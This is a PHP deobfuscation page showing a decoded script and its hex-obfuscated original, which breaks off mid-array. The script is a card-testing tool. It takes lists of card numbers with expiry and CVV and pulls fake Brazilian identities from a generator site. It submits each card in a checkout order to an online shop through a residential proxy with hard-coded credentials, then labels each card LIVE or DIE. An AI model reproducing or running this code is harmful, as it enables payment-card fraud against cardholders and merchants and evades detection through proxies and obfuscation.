Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

/* Decoded by unphp.net */ goto D2DZy; tlYVP: function trazer($string, $start, $end)..

Decoded Output download

<?  /* Decoded by unphp.net */ 
 
 
 goto D2DZy; tlYVP: function trazer($string, $start, $end) { $strArray = explode($start, $string); if (isset($strArray[1])) { $str = implode($start, array_slice($strArray, 1)); if (!empty($str)) { $strArray = explode($end, $str); return isset($strArray[0]) ? $strArray[0] : ''; } } return ''; } goto f42n3; f42n3: $listaCartoes = isset($_POST["cartao"]) ? explode("\xa", $_POST["cartao"]) : array(); goto gzP6G; D2DZy: set_time_limit(0); goto c7FYA; qYD66: ini_set("display_errors", 1); goto e2IVg; C7v5c: ini_set("memory_limit", "-1"); goto qYD66; e2IVg: $time = time(); goto tlYVP; c7FYA: error_reporting(E_ALL); goto C7v5c; gzP6G: foreach ($listaCartoes as $cartao) { $separar = array_map("trim", explode("|", $cartao)); if (count($separar) >= 4) { $cc = $separar[0]; $mes = $separar[1]; $ano = $separar[2]; $cvv = $separar[3]; $api_url = "https://www.4devs.com.br/ferramentas_online.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $api_url); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd() . "/cookies.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd() . "/cookies.txt"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, array("Host: www.4devs.com.br", "Accept: */*", "Sec-Fetch-Dest: empty", "Content-Type: application/x-www-form-urlencoded", "origin: https://www.4devs.com.br", "Sec-Fetch-Site: same-origin", "Sec-Fetch-Mode: cors", "referer: https://www.4devs.com.br/gerador_de_pessoas")); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "acao=gerar_pessoa&sexo=I&pontuacao=N&idade=0&cep_estado=&txt_qtde=1&cep_cidade="); $apiData = curl_exec($ch); if ($apiData === false) { echo "Erro cURL na requisi\xc3\247\xc3\xa3o para 4Devs: " . curl_error($ch) . "
"; continue; } $nome = trazer($apiData, ""nome":"", """); $email_4devs = trazer($apiData, ""email":"", """); $cpf = trazer($apiData, ""cpf":"", """); $telefone = trazer($apiData, ""celular":"", """); $cep = trazer($apiData, ""cep":"", """); $estado = trazer($apiData, ""estado":"", """); $cidade = trazer($apiData, ""cidade":"", """); $endereco = trazer($apiData, ""endereco":"", """); $bairro = trazer($apiData, ""bairro":"", """); $partes_email_4devs = explode("@", $email_4devs); $primeira_parte_email_4devs = isset($partes_email_4devs[0]) ? $partes_email_4devs[0] : "nomepadrao"; $dominios_possiveis = array("hotmail.com", "gmail.com", "outlook.com"); $dominio_aleatorio = $dominios_possiveis[array_rand($dominios_possiveis)]; $email_final = $primeira_parte_email_4devs . "@" . $dominio_aleatorio; $parte1 = substr($cc, 0, 4); $parte2 = substr($cc, 4, 4); $parte3 = substr($cc, 8, 4); $parte4 = substr($cc, 12, 4); $numend = rand(1, 9999); $parcelas = rand(1, 3); $cc_formatado = str_replace(" ", '', $cc); $email_final = $primeira_parte_email_4devs . "@" . $dominio_aleatorio; $cart_tokens = array(''); $random_index = mt_rand(0, count($cart_tokens) - 1); $selected_cart_token = $cart_tokens[$random_index]; $jsonData1 = "{
  "inputs_with_errors": [],\xa  "cart_token": "aae6f243-3f84-482d-889e-75bc8a3d2035",
  "payment_method": "credit_card_spacefy",
  "card_cvv": "" . $cvv . "",
  "card_doc": "" . $cpf . "",
  "card_email": "",
  "card_expiry": "",
  "card_installments": "1",
  "card_month": "" . $mes . "",\xa  "card_name": "" . $nome . "",
  "card_number": "" . $cc_formatado . "",
  "card_token": "",\xa  "card_year": "" . $ano . "",\xa  "opt_in": true,\xa  "visitor_id": "RGVza3RvcDtXaW5kb3dzK0dvacOibmlhO0JyYXppbDtWIHRhbDtHb2nDom5pYSwgR08sIEJyYXppbDtmYWxzZQ==",\xa  "email": "" . $email_final . "",
  "step_personal_data": true,
  "first_name": "" . $nome . "",
  "doc": "" . $cpf . "",\xa  "phone": "" . $telefone . "",
  "postal_code": "" . $cep . "",\xa  "step_delivery_address": true,
  "textButtonBuy": "<b>PAGAR </b>1 x R$ 9,90  ",\xa  "step_payment_methods": true,\xa  "state": "" . $estado . "",\xa  "city": "" . $cidade . "",\xa  "address_line_1": "" . $endereco . "",
  "address_neighborhood": "" . $bairro . "",\xa  "shipping_method_id": "16389",\xa  "shipping_method": {\xa    "id": 16389,\xa    "title": "Correios",
    "price": 0,\xa    "min_deadline": 7,
    "max_deadline": 10,\xa    "shop_id": 11908,\xa    "order_min_value": 0,\xa    "enabled": 1,
    "deadline": "",\xa    "formatted_price": "R$ 0,00",\xa    "formatted_order_min_value": "R$ 0,00"\xa  },\xa  "address_number": "" . $numend . "",
  "cvv": "" . $cvv . ""\xa}"; $jsonDataArray = array($jsonData1); shuffle($jsonDataArray); foreach ($jsonDataArray as $index => $jsonData) { } $jsonData = str_replace(""card_number\":\"4593 8400 1779 9234"", ""card_number\":\"" . $cc_formatado . """, $jsonData); $jsonData = str_replace(""card_month\":\"10"", ""card_month\":\"" . $mes . """, $jsonData); $jsonData = str_replace(""card_year\":\"2024"", ""card_year\":\"" . $ano . """, $jsonData); $jsonData = str_replace(""cvv\":\"501\"", ""cvv\":\"" . $cvv . """, $jsonData); $jsonData = str_replace(""card_name\":\"DIOGO PEDRO BERNARDES\"", ""card_name\":\"" . $nome . """, $jsonData); $jsonData = str_replace(""doc\":\"80496666703\"", ""doc\":\"" . $cpf . """, $jsonData); $jsonData = str_replace(""email\":\"[email protected]\"", ""email\":\"" . $email_final . """, $jsonData); $jsonData = str_replace(""phone\":\"92927481357\"", ""phone\":\"" . $telefone . """, $jsonData); $jsonData = str_replace(""postal_code\":\"31330-540\"", ""postal_code\":\"" . $cep . """, $jsonData); $jsonData = str_replace(""state\":\"MG\"", ""state\":\"" . $estado . """, $jsonData); $jsonData = str_replace(""city\":\"Belo Horizonte\"", ""city\":\"" . $cidade . """, $jsonData); $jsonData = str_replace(""address_line_1\":\"Rua Jos\303\251 Moura Pe\303\xa7anha\"", ""address_line_1\":\"" . $endereco . """, $jsonData); $jsonData = str_replace(""address_neighborhood\":\"Ouro Preto\"", ""address_neighborhood\":\"" . $bairro . """, $jsonData); $jsonData = str_replace(""address_number\":\"238\"", ""address_number\":\"" . $numend . """, $jsonData); $jsonData = str_replace(""card_installments\":\"2\"", ""card_installments\":\"" . $parcelas . """, $jsonData); $proxy_user = "novonovo1-zone-resi-region-br"; $proxy_pass = "novonovo1"; $proxy_ip = "3d65ed224588c408.zqz.na.pyproxy.io"; $proxy_port = "16666"; $payment_url = "https://shopify-2.finalizarcompra.com/orders"; $curl_payment = curl_init(); curl_setopt($curl_payment, CURLOPT_PROXY, $proxy_ip); curl_setopt($curl_payment, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl_payment, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl_payment, CURLOPT_PROXYPORT, $proxy_port); curl_setopt($curl_payment, CURLOPT_PROXYUSERPWD, "{$proxy_user}:{$proxy_pass}"); $httpCode = curl_getinfo($curl_payment, CURLINFO_HTTP_CODE); curl_setopt_array($curl_payment, array(CURLOPT_URL => $payment_url, CURLOPT_RETURNTRANSFER => false, CURLOPT_ENCODING => '', CURLOPT_MAXREDIRS => 10, CURLOPT_TIMEOUT => 30, CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1, CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_POSTFIELDS => $jsonData, CURLOPT_HTTPHEADER => array("accept: application/json", "accept-encoding: gzip, deflate, br", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7", "connection: keep-alive", "content-type: application/json", "host: shopify-2.finalizarcompra.com", "origin: https://shopify-2.finalizarcompra.com", "referer: https://shopify-2.finalizarcompra.com/checkout", "sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"", "sec-ch-ua-mobile: ?0", "sec-ch-ua-platform: "Windows"", "sec-fetch-dest: empty", "sec-fetch-mode: cors", "sec-fetch-site: same-origin", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"))); $response_payment = curl_exec($curl_payment); $info_payment = curl_getinfo($curl_payment); $err_payment = curl_error($curl_payment); $elapsed_time = time() - $time; $info_payment = curl_getinfo($curl_payment); $httpCode_payment = $info_payment["http_code"]; $retornomensagem = trazer($response_payment, "message":"", """); $response_decoded = json_decode($response_payment, true); if ($httpCode_payment == 200) { echo "<span class='badge badge-success' style='color:white'>LIVE:</span> \342\236\224 </span><span class='badge badge-info' style='color:white'> " . $cc . "|" . $mes . "|" . $ano . "|" . $cvv . " </span> <span class='badge badge-info' style='color:white'></span></h5><br>"; } else { echo "<span class='badge badge-danger' style='color:white'>DIE</span> \xe2\236\x94 </span><span class='badge badge-danger' style='color:white'>  " . $cc . "|" . $mes . "|" . $ano . "|" . $cvv . " </span> <span class='badge badge-danger' style='color:white'></span></h5><br>"; } } } goto i8qSy; i8qSy:  ?>

Did this file decode correctly?

Original Code

/* Decoded by unphp.net */


 goto D2DZy; tlYVP: function trazer($string, $start, $end) { $strArray = explode($start, $string); if (isset($strArray[1])) { $str = implode($start, array_slice($strArray, 1)); if (!empty($str)) { $strArray = explode($end, $str); return isset($strArray[0]) ? $strArray[0] : ''; } } return ''; } goto f42n3; f42n3: $listaCartoes = isset($_POST["\143\141\x72\x74\x61\157"]) ? explode("\xa", $_POST["\143\141\x72\x74\141\x6f"]) : array(); goto gzP6G; D2DZy: set_time_limit(0); goto c7FYA; qYD66: ini_set("\x64\151\163\x70\x6c\141\171\137\x65\x72\162\157\x72\x73", 1); goto e2IVg; C7v5c: ini_set("\155\145\x6d\x6f\162\x79\137\154\x69\155\x69\x74", "\x2d\x31"); goto qYD66; e2IVg: $time = time(); goto tlYVP; c7FYA: error_reporting(E_ALL); goto C7v5c; gzP6G: foreach ($listaCartoes as $cartao) { $separar = array_map("\x74\162\x69\155", explode("\x7c", $cartao)); if (count($separar) >= 4) { $cc = $separar[0]; $mes = $separar[1]; $ano = $separar[2]; $cvv = $separar[3]; $api_url = "\150\x74\164\x70\x73\x3a\57\57\167\x77\167\x2e\64\144\x65\x76\x73\56\143\x6f\155\x2e\142\x72\57\146\145\x72\162\141\155\x65\x6e\164\x61\163\137\157\x6e\154\151\156\x65\56\x70\150\x70"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $api_url); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd() . "\x2f\x63\157\157\x6b\151\x65\163\x2e\x74\170\164"); curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd() . "\x2f\143\x6f\157\x6b\151\x65\163\56\164\x78\164"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, array("\110\x6f\x73\164\x3a\40\167\167\x77\x2e\64\x64\x65\x76\163\x2e\143\x6f\155\x2e\x62\162", "\101\143\143\145\x70\x74\x3a\40\x2a\57\52", "\123\x65\143\55\x46\145\x74\x63\150\55\x44\145\x73\164\x3a\40\145\x6d\x70\x74\171", "\x43\157\156\164\x65\156\x74\55\124\x79\160\145\72\x20\x61\160\x70\154\151\x63\x61\164\151\x6f\x6e\x2f\x78\55\167\x77\x77\x2d\146\157\x72\x6d\55\x75\162\154\145\156\143\x6f\x64\145\x64", "\x6f\x72\151\147\x69\x6e\x3a\x20\x68\x74\x74\160\x73\72\x2f\x2f\x77\167\167\x2e\64\144\x65\166\x73\x2e\143\157\x6d\x2e\x62\x72", "\123\145\x63\55\106\145\164\x63\150\x2d\123\151\x74\145\72\x20\163\x61\155\x65\x2d\x6f\162\151\147\151\156", "\123\x65\x63\x2d\x46\x65\x74\143\x68\x2d\x4d\x6f\144\145\72\x20\x63\x6f\162\163", "\x72\x65\146\145\162\145\162\72\40\150\164\x74\160\x73\x3a\57\x2f\x77\167\x77\56\x34\144\145\166\x73\56\x63\x6f\x6d\x2e\142\x72\57\x67\145\162\x61\x64\157\x72\x5f\x64\x65\x5f\160\x65\163\163\157\x61\163")); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "\x61\143\x61\157\75\x67\x65\162\x61\x72\137\x70\x65\x73\x73\x6f\x61\x26\x73\145\170\157\75\111\x26\160\x6f\x6e\164\165\x61\143\141\x6f\75\116\46\151\144\x61\144\x65\x3d\x30\46\x63\x65\x70\137\145\163\x74\x61\144\x6f\75\46\x74\170\x74\x5f\x71\x74\144\x65\75\61\46\x63\145\x70\137\x63\x69\144\x61\144\x65\75"); $apiData = curl_exec($ch); if ($apiData === false) { echo "\x45\x72\x72\x6f\x20\143\125\122\x4c\40\x6e\141\40\x72\145\x71\165\151\163\x69\xc3\247\xc3\xa3\157\x20\x70\x61\162\x61\x20\64\x44\x65\166\163\x3a\40" . curl_error($ch) . "\12"; continue; } $nome = trazer($apiData, "\x22\156\157\x6d\x65\42\72\42", "\x22"); $email_4devs = trazer($apiData, "\x22\x65\155\x61\151\154\x22\72\42", "\x22"); $cpf = trazer($apiData, "\x22\x63\160\146\x22\x3a\x22", "\x22"); $telefone = trazer($apiData, "\42\x63\x65\154\165\x6c\x61\x72\42\x3a\x22", "\42"); $cep = trazer($apiData, "\x22\143\x65\x70\x22\72\x22", "\42"); $estado = trazer($apiData, "\42\x65\x73\x74\x61\144\157\x22\72\x22", "\42"); $cidade = trazer($apiData, "\x22\143\151\x64\141\x64\x65\x22\x3a\42", "\x22"); $endereco = trazer($apiData, "\x22\x65\x6e\144\145\x72\x65\143\x6f\42\x3a\42", "\x22"); $bairro = trazer($apiData, "\x22\142\141\151\162\162\x6f\x22\x3a\x22", "\x22"); $partes_email_4devs = explode("\x40", $email_4devs); $primeira_parte_email_4devs = isset($partes_email_4devs[0]) ? $partes_email_4devs[0] : "\x6e\x6f\x6d\x65\160\141\x64\x72\x61\x6f"; $dominios_possiveis = array("\x68\157\164\155\141\x69\x6c\x2e\143\157\155", "\147\x6d\141\x69\x6c\56\143\157\x6d", "\x6f\165\x74\154\157\157\x6b\x2e\143\x6f\155"); $dominio_aleatorio = $dominios_possiveis[array_rand($dominios_possiveis)]; $email_final = $primeira_parte_email_4devs . "\100" . $dominio_aleatorio; $parte1 = substr($cc, 0, 4); $parte2 = substr($cc, 4, 4); $parte3 = substr($cc, 8, 4); $parte4 = substr($cc, 12, 4); $numend = rand(1, 9999); $parcelas = rand(1, 3); $cc_formatado = str_replace("\40", '', $cc); $email_final = $primeira_parte_email_4devs . "\x40" . $dominio_aleatorio; $cart_tokens = array(''); $random_index = mt_rand(0, count($cart_tokens) - 1); $selected_cart_token = $cart_tokens[$random_index]; $jsonData1 = "\x7b\12\40\40\x22\151\x6e\160\x75\x74\163\x5f\167\151\164\x68\x5f\145\162\x72\157\162\163\42\72\x20\x5b\135\x2c\xa\x20\40\x22\143\141\162\x74\x5f\164\x6f\x6b\145\156\42\x3a\40\42\x61\141\x65\66\146\x32\x34\x33\55\x33\x66\70\x34\55\x34\70\62\x64\55\x38\x38\x39\145\55\x37\x35\x62\143\70\141\x33\144\62\60\x33\65\42\54\12\x20\x20\x22\160\141\171\x6d\145\x6e\x74\x5f\155\x65\164\150\x6f\x64\x22\x3a\40\x22\143\x72\145\144\151\164\137\143\141\x72\144\137\x73\x70\x61\143\145\146\171\42\54\12\x20\40\x22\143\x61\x72\144\x5f\143\166\166\42\72\x20\x22" . $cvv . "\42\54\12\x20\40\x22\143\141\162\144\137\x64\x6f\143\42\x3a\40\x22" . $cpf . "\42\x2c\12\40\40\42\143\141\162\x64\x5f\145\155\x61\151\154\42\72\x20\x22\42\x2c\12\40\40\x22\143\x61\x72\144\x5f\145\170\x70\x69\x72\x79\x22\72\40\42\x22\54\12\x20\40\42\143\x61\162\144\x5f\151\x6e\163\x74\141\154\154\155\145\x6e\164\163\x22\x3a\40\42\61\42\x2c\12\40\40\x22\143\x61\x72\144\x5f\155\x6f\x6e\164\150\x22\72\40\42" . $mes . "\42\54\xa\40\40\x22\143\x61\x72\144\137\x6e\141\x6d\x65\x22\x3a\x20\42" . $nome . "\x22\x2c\12\40\x20\x22\x63\x61\162\x64\137\x6e\165\155\142\145\x72\x22\72\x20\42" . $cc_formatado . "\x22\x2c\12\x20\x20\x22\x63\141\162\144\x5f\164\x6f\x6b\145\x6e\42\x3a\x20\x22\42\54\xa\x20\40\x22\143\141\x72\144\x5f\x79\x65\x61\162\42\72\40\x22" . $ano . "\x22\54\xa\40\40\x22\157\160\164\x5f\x69\156\x22\x3a\40\x74\162\x75\145\54\xa\x20\x20\42\166\151\163\151\x74\x6f\162\x5f\x69\144\42\72\x20\42\x52\x47\x56\x7a\141\x33\122\x76\143\x44\x74\130\141\127\65\153\142\63\144\x7a\x4b\60\x64\x76\141\x63\117\x69\142\155\x6c\x68\117\x30\112\171\x59\x58\160\x70\x62\x44\x74\x57\x49\110\x52\150\x62\x44\x74\110\142\62\x6e\104\157\x6d\x35\x70\131\x53\x77\147\x52\x30\70\163\x49\105\112\171\131\x58\160\x70\x62\x44\164\x6d\x59\x57\170\x7a\132\x51\x3d\75\x22\54\xa\40\x20\42\x65\155\x61\151\154\42\72\x20\42" . $email_final . "\x22\54\12\x20\40\x22\163\164\x65\160\137\x70\x65\162\163\157\156\x61\154\137\144\141\x74\141\42\72\40\164\162\x75\x65\x2c\12\x20\x20\x22\x66\x69\x72\x73\164\137\x6e\141\155\145\x22\72\40\x22" . $nome . "\x22\54\12\40\40\x22\x64\x6f\143\42\x3a\40\x22" . $cpf . "\x22\x2c\xa\40\40\x22\x70\x68\x6f\x6e\145\x22\x3a\40\x22" . $telefone . "\x22\54\12\40\x20\x22\x70\157\163\164\141\x6c\x5f\143\157\144\145\42\x3a\40\x22" . $cep . "\x22\x2c\xa\x20\x20\42\x73\x74\x65\160\x5f\x64\145\154\151\166\145\162\171\137\141\144\144\162\x65\x73\163\x22\72\x20\164\x72\x75\x65\54\12\x20\x20\42\164\145\170\x74\102\x75\164\164\x6f\156\102\x75\171\42\x3a\40\42\74\142\76\120\x41\x47\x41\x52\40\74\x2f\x62\x3e\61\x20\170\x20\122\44\x20\71\x2c\x39\60\40\x20\42\54\xa\40\40\42\163\164\145\160\137\160\x61\x79\155\x65\x6e\x74\137\155\x65\164\150\157\x64\163\42\x3a\x20\x74\162\x75\145\54\xa\40\40\42\163\x74\141\164\x65\x22\x3a\x20\x22" . $estado . "\42\x2c\xa\x20\40\42\x63\151\x74\x79\x22\x3a\x20\x22" . $cidade . "\42\x2c\xa\x20\40\42\141\144\x64\x72\145\x73\x73\x5f\154\x69\156\145\137\61\42\x3a\40\x22" . $endereco . "\42\54\12\40\40\42\141\x64\144\162\x65\163\163\x5f\x6e\x65\151\147\150\142\157\162\150\157\157\x64\42\x3a\x20\x22" . $bairro . "\42\x2c\xa\40\40\x22\163\150\x69\160\160\151\x6e\x67\137\155\x65\x74\150\157\x64\137\151\x64\x22\x3a\x20\42\x31\x36\x33\x38\x39\42\x2c\xa\x20\x20\42\163\x68\x69\160\x70\x69\156\147\137\155\145\164\150\x6f\144\x22\x3a\x20\173\xa\40\40\40\40\x22\151\x64\42\x3a\x20\61\x36\63\70\71\54\xa\x20\40\x20\x20\42\x74\151\x74\x6c\x65\x22\x3a\x20\42\x43\157\162\162\145\x69\x6f\x73\42\54\12\40\x20\x20\x20\42\x70\162\x69\x63\145\x22\72\40\x30\54\xa\40\40\40\40\42\155\151\x6e\x5f\144\145\141\x64\154\x69\156\x65\42\x3a\x20\x37\54\12\40\40\40\x20\42\x6d\x61\x78\x5f\x64\145\x61\x64\x6c\151\x6e\145\42\72\40\x31\x30\x2c\xa\x20\40\40\40\42\163\x68\x6f\x70\x5f\x69\x64\x22\x3a\x20\x31\x31\71\60\70\54\xa\40\40\x20\x20\42\157\162\144\x65\x72\137\x6d\151\x6e\x5f\x76\x61\154\165\145\x22\72\40\60\54\xa\x20\x20\40\40\x22\145\156\x61\142\154\x65\x64\x22\72\x20\x31\x2c\12\40\40\40\40\42\144\145\141\x64\x6c\x69\x6e\145\42\72\40\x22\x22\54\xa\x20\40\40\40\x22\x66\x6f\x72\155\141\x74\x74\x65\x64\x5f\x70\162\x69\x63\145\42\72\40\42\x52\x24\40\x30\x2c\60\60\42\x2c\xa\40\x20\x20\x20\x22\x66\x6f\162\x6d\x61\164\x74\145\144\x5f\157\162\144\145\162\x5f\x6d\151\156\137\166\x61\154\x75\145\42\x3a\x20\x22\122\x24\x20\60\54\60\x30\42\xa\x20\40\x7d\54\xa\40\40\x22\x61\144\x64\162\x65\x73\163\137\156\x75\x6d\142\x65\162\x22\x3a\x20\x22" . $numend . "\42\54\12\x20\40\42\143\x76\x76\x22\x3a\40\42" . $cvv . "\x22\xa\x7d"; $jsonDataArray = array($jsonData1); shuffle($jsonDataArray); foreach ($jsonDataArray as $index => $jsonData) { } $jsonData = str_replace("\x22\x63\141\x72\144\x5f\x6e\x75\x6d\142\x65\162\134\x22\72\134\x22\64\65\x39\63\40\x38\64\x30\x30\40\61\67\67\71\x20\x39\62\x33\64\x22", "\x22\143\141\162\x64\x5f\x6e\165\155\x62\x65\x72\134\42\72\x5c\x22" . $cc_formatado . "\42", $jsonData); $jsonData = str_replace("\x22\143\141\162\x64\137\x6d\x6f\156\x74\x68\134\x22\72\x5c\42\x31\60\42", "\x22\x63\141\x72\x64\x5f\155\x6f\156\x74\x68\134\42\72\x5c\x22" . $mes . "\x22", $jsonData); $jsonData = str_replace("\42\143\141\x72\144\x5f\x79\x65\x61\162\x5c\42\x3a\x5c\x22\62\x30\x32\64\42", "\x22\x63\x61\x72\x64\137\171\145\141\162\x5c\x22\x3a\x5c\42" . $ano . "\42", $jsonData); $jsonData = str_replace("\42\143\166\x76\134\42\72\x5c\x22\x35\60\61\134\42", "\x22\143\x76\x76\x5c\42\x3a\x5c\42" . $cvv . "\42", $jsonData); $jsonData = str_replace("\42\x63\141\162\x64\x5f\156\x61\155\x65\134\42\x3a\134\x22\104\x49\x4f\x47\x4f\x20\x50\105\x44\122\x4f\40\102\x45\122\116\x41\x52\104\x45\123\x5c\42", "\42\143\141\162\x64\137\x6e\x61\155\145\134\x22\x3a\134\x22" . $nome . "\42", $jsonData); $jsonData = str_replace("\42\144\x6f\x63\x5c\x22\x3a\134\x22\70\60\64\x39\66\x36\x36\x36\67\x30\63\134\x22", "\42\x64\x6f\143\x5c\42\x3a\x5c\42" . $cpf . "\42", $jsonData); $jsonData = str_replace("\42\x65\155\141\x69\x6c\x5c\x22\72\134\x22\x64\x69\157\147\157\x5f\142\145\162\x6e\141\162\144\145\163\100\147\x6d\141\151\154\x2e\143\157\155\x5c\42", "\x22\x65\155\141\x69\x6c\134\42\72\x5c\x22" . $email_final . "\x22", $jsonData); $jsonData = str_replace("\42\x70\x68\157\x6e\145\134\x22\72\x5c\x22\71\62\71\62\67\x34\x38\61\x33\65\67\134\42", "\42\x70\x68\157\x6e\x65\x5c\x22\72\x5c\x22" . $telefone . "\42", $jsonData); $jsonData = str_replace("\x22\160\x6f\163\x74\141\x6c\x5f\143\157\x64\145\x5c\42\72\134\42\x33\61\63\63\x30\55\x35\x34\60\x5c\42", "\x22\x70\157\163\164\141\154\x5f\x63\157\x64\x65\134\x22\72\x5c\x22" . $cep . "\42", $jsonData); $jsonData = str_replace("\x22\163\x74\141\x74\145\x5c\42\72\134\42\115\x47\134\42", "\42\x73\x74\141\164\145\x5c\x22\x3a\x5c\42" . $estado . "\x22", $jsonData); $jsonData = str_replace("\42\x63\151\164\171\x5c\42\72\x5c\42\102\x65\154\x6f\x20\110\157\x72\x69\172\x6f\156\x74\x65\x5c\x22", "\42\x63\151\x74\171\x5c\x22\72\134\x22" . $cidade . "\x22", $jsonData); $jsonData = str_replace("\x22\x61\x64\x64\162\x65\x73\163\x5f\154\151\x6e\x65\137\61\134\42\72\x5c\42\122\165\141\x20\x4a\x6f\163\303\251\x20\115\x6f\x75\162\141\40\120\145\303\xa7\x61\x6e\150\x61\134\x22", "\42\x61\144\144\x72\x65\163\x73\137\154\151\156\145\137\x31\x5c\x22\x3a\x5c\42" . $endereco . "\42", $jsonData); $jsonData = str_replace("\42\141\x64\144\162\x65\x73\x73\137\156\145\x69\147\x68\x62\157\162\x68\157\x6f\x64\x5c\42\x3a\x5c\x22\x4f\165\162\157\x20\120\162\x65\164\157\134\42", "\42\x61\144\144\x72\x65\x73\163\137\156\x65\x69\147\x68\142\157\162\x68\157\157\144\134\42\x3a\x5c\x22" . $bairro . "\42", $jsonData); $jsonData = str_replace("\x22\x61\x64\144\162\145\163\x73\137\x6e\x75\x6d\x62\x65\162\134\42\72\x5c\x22\62\x33\x38\x5c\x22", "\42\x61\144\x64\x72\145\163\163\137\x6e\x75\x6d\142\x65\x72\134\42\x3a\134\42" . $numend . "\42", $jsonData); $jsonData = str_replace("\x22\143\141\162\144\x5f\151\156\163\164\x61\154\x6c\x6d\x65\x6e\164\x73\134\x22\x3a\x5c\42\x32\x5c\42", "\x22\x63\141\162\x64\137\151\x6e\x73\x74\x61\154\154\155\x65\x6e\164\163\134\x22\x3a\134\42" . $parcelas . "\x22", $jsonData); $proxy_user = "\x6e\157\166\157\x6e\x6f\166\x6f\x31\x2d\172\157\156\x65\55\x72\145\163\x69\x2d\162\x65\x67\x69\x6f\x6e\x2d\142\x72"; $proxy_pass = "\x6e\157\166\157\x6e\x6f\x76\157\61"; $proxy_ip = "\63\144\x36\x35\145\x64\x32\x32\x34\65\70\x38\x63\64\60\70\56\172\x71\172\56\156\141\x2e\x70\171\160\x72\x6f\x78\x79\56\x69\x6f"; $proxy_port = "\x31\x36\x36\x36\66"; $payment_url = "\150\164\164\x70\163\x3a\57\57\x73\150\157\x70\x69\x66\x79\x2d\62\56\x66\151\156\141\x6c\151\172\141\162\x63\157\155\x70\x72\x61\56\x63\157\155\57\x6f\x72\144\145\162\x73"; $curl_payment = curl_init(); curl_setopt($curl_payment, CURLOPT_PROXY, $proxy_ip); curl_setopt($curl_payment, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl_payment, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl_payment, CURLOPT_PROXYPORT, $proxy_port); curl_setopt($curl_payment, CURLOPT_PROXYUSERPWD, "{$proxy_user}\x3a{$proxy_pass}"); $httpCode = curl_getinfo($curl_payment, CURLINFO_HTTP_CODE); curl_setopt_array($curl_payment, array(CURLOPT_URL => $payment_url, CURLOPT_RETURNTRANSFER => false, CURLOPT_ENCODING => '', CURLOPT_MAXREDIRS => 10, CURLOPT_TIMEOUT => 30, CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1, CURLOPT_CUSTOMREQUEST => "\120\117\x53\124", CURLOPT_POSTFIELDS => $jsonData, CURLOPT_HTTPHEADER => array("\x61\x63\143\x65\x70\x74\x3a\x20\x61\x70\160\154\x69\143\141\x74\x69\157\x6e\x2f\x6a\163\157\x6e", "\x61\143\x63\145\x70\164\55\x65\156\143\157\144\151\x6e\147\x3a\x20\x67\x7a\x69\160\54\x20\x64\x65\x66\x6c\x61\x74\x65\54\x20\142\162", "\x61\143\x63\x65\x70\x74\55\x6c\x61\x6e\147\x75\141\147\145\72\x20\160\164\55\x42\122\x2c\160\x74\73\x71\75\x30\56\x39\54\145\156\55\x55\x53\73\161\x3d\60\56\70\x2c\x65\156\x3b\161\x3d\x30\x2e\x37", "\x63\x6f\156\x6e\x65\143\x74\x69\x6f\156\72\x20\x6b\145\x65\160\x2d\x61\154\x69\166\145", "\x63\x6f\x6e\x74\145\x6e\164\x2d\x74\171\160\x65\x3a\x20\x61\160\160\154\x69\143\x61\x74\x69\157\x6e\57\x6a\x73\157\156", "\150\x6f\x73\164\72\x20\163\x68\157\x70\x69\x66\171\x2d\62\56\146\151\x6e\141\x6c\151\172\x61\162\143\157\155\x70\162\x61\56\x63\157\155", "\x6f\x72\x69\x67\151\x6e\72\40\150\164\x74\160\163\72\57\57\163\150\x6f\160\x69\146\x79\55\62\56\x66\151\x6e\x61\x6c\151\x7a\141\x72\143\x6f\155\160\162\141\x2e\143\x6f\155", "\162\x65\x66\x65\162\145\162\x3a\x20\x68\x74\164\x70\x73\72\57\x2f\x73\150\157\x70\151\146\171\x2d\x32\x2e\146\151\x6e\141\x6c\151\172\141\x72\x63\157\x6d\160\x72\x61\56\143\157\155\57\143\150\145\143\153\157\165\164", "\163\x65\143\55\x63\150\55\x75\141\72\x20\42\103\x68\162\x6f\x6d\151\165\x6d\42\x3b\x76\x3d\42\61\x32\62\x22\x2c\x20\x22\116\x6f\164\x28\101\72\102\x72\x61\x6e\144\x22\73\x76\75\42\62\64\42\x2c\40\x22\x47\x6f\x6f\147\x6c\145\x20\103\150\162\x6f\155\x65\x22\x3b\166\75\42\x31\x32\62\x22", "\163\145\143\x2d\x63\x68\x2d\x75\x61\55\x6d\x6f\142\151\154\x65\72\40\77\60", "\x73\145\x63\55\143\150\x2d\165\141\x2d\x70\x6c\141\x74\146\157\x72\155\72\40\42\127\x69\x6e\144\157\x77\x73\42", 